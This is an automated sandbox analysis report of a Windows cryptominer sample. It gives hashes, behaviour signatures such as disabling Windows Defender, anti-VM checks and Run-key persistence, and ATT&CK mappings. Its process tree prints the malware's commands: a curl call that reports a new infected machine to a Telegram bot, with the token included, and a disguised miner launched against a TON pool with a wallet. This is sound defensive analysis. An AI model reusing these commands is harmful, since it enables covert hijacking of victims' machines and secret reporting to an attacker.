Analysis

  • max time kernel
    8s
  • max time network
    11s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    19-01-2022 15:22

General

  • Target

    b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb.exe

  • Size

    1.2MB

  • MD5

    600c20e18834769dc0ae528c69108a5d

  • SHA1

    743b942a951d381c0e3efc1fac3e2f09740769c2

  • SHA256

    b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb

  • SHA512

    36079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb.exe
    "C:\Users\Admin\AppData\Local\Temp\b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb.exe"
    1⤵
    • Checks BIOS information in registry
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3292
    • C:\Windows\SYSTEM32\curl.exe
      curl "https://api.telegram.org/bot1765686682:AAFKW2CipVCRG2oYuHNFJMKO8RSC06ZylW8/sendMessage?chat_id=-679243704&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: None%0A(Windows Defender has been turned off)"
      2⤵
      PID:1620
    • C:\Windows\bfsvc.exe
      C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm
      2⤵
      PID:3544
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"
      2⤵
      PID:3536

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

  • Modify Existing Service (1) T1031
  • Registry Run Keys / Startup Folder (1) T1060

Defense Evasion

  • Modify Registry (2) T1112
  • Disabling Security Tools (1) T1089
  • Virtualization/Sandbox Evasion (1) T1497

Discovery

  • Query Registry (2) T1012
  • Virtualization/Sandbox Evasion (1) T1497
  • System Information Discovery (2) T1082

Downloads

  • memory/3292-130-0x00007FF723B30000-0x00007FF723F6B000-memory.dmp
    Filesize 4.2MB
  • memory/3292-131-0x00007FF723B30000-0x00007FF723F6B000-memory.dmp
    Filesize 4.2MB
  • memory/3292-132-0x00007FF723B30000-0x00007FF723F6B000-memory.dmp
    Filesize 4.2MB
  • memory/3536-134-0x0000000140000000-0x000000014002A000-memory.dmp
    Filesize 168KB
  • memory/3544-133-0x0000000140000000-0x000000014274C000-memory.dmp
    Filesize 39.3MB